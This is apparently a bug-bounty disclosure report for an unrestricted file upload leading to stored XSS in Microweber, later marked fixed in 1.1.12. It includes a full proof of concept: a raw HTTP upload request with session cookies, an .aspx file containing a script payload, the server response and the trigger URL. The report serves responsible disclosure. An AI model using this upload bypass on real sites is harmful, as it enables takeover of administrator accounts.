Unrestricted file upload leads to stored XSS in microweber/microweber

Valid

Reported on

Mar 9th 2022

Description

A user can bypass checking and upload .aspx file which lead to stored XSS.

Proof of Concept

Log in as admin: https://demo.microweber.org/demo/admin/
Go to Websites > Edit a page.
Under Pictures, choose Add files
Instead of uploading a normal picture, use the below request to upload an aspx file.

-- The request to upload:

POST /demo/plupload HTTP/1.1
Host: demo.microweber.org
Cookie: csrf-token-data=%7B%22value%22%3A%22LbUJYT94IdMzaqSj3tCwbEgp402H94lb3LBdoQK8%22%2C%22expiry%22%3A1646836721840%7D; laravel_session=ZNv8dU4zHigWLlPFd8LQoeMyJtWGy8GK5Su1IA2F; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/
Content-Length: 533
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7ACkSBriVfqdfw4D
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/page/24/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="name"

xss.aspx
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundary7ACkSBriVfqdfw4D
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: text/html

<html>
<script>alert(document.domain)</script>
</html>
IEND®B`
------WebKitFormBoundary7ACkSBriVfqdfw4D--

The response:

HTTP/1.1 200 OK
Date: Wed, 09 Mar 2022 14:26:01 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Mar 2022 14:26:01 GMT
Connection: close
Content-Type: application/json
Content-Length: 123

{"src":"https:\/\/demo.microweber.org\/demo\/userfiles\/media\/default\/xss.aspx","name":"xss.aspx","bytes_uploaded":"533"}

request-response

Visit https://demo.microweber.org/demo/userfiles/media/default/xss.aspx to confirm the XSS.

XSS

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user, in this case, an admin.

We are processing your report and will contact the microweber team within 24 hours. a year ago

Peter Ivanov modified the report

a year ago

Peter Ivanov validated this vulnerability a year ago

Quan Doan has been awarded the disclosure bounty

The fix bounty is now up for grabs

Peter Ivanov marked this as fixed in 1.1.12 with commit d9bae9 a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation